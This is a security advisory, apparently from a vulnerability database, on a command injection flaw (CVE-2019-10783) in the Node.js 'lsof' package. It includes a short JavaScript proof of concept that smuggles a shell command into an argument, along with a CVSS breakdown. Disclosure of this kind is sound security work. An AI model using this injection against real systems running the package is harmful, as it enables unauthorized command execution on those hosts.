Overview
lsof is an lsof processor for Node.js.
Affected versions of this package are vulnerable to Command Injection. Multiple areas of the package are vulnerable: every exported method passes user-supplied input to the exec function, so shell metacharacters in that input are interpreted by the shell.
PoC by JHU System Security Lab

```javascript
var root = require("lsof");
// Shell metacharacters in the argument are interpreted by exec, so the
// injected echo runs and writes create.txt alongside the lsof call.
var attack_code = "& echo vulnerable > create.txt &";
root.rawTcpPort(attack_code, function(){});
```
Remediation
There is no fixed version for lsof.
CVSS Score
7.5 (high severity)
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Confidentiality: High
- Integrity: None
- Availability: None
- Credit: JHU System Security Lab
- CVE: CVE-2019-10783
- CWE: CWE-78
- Snyk ID: SNYK-JS-LSOF-543632
- Disclosed: 29 Jan, 2020
- Published: 29 Jan, 2020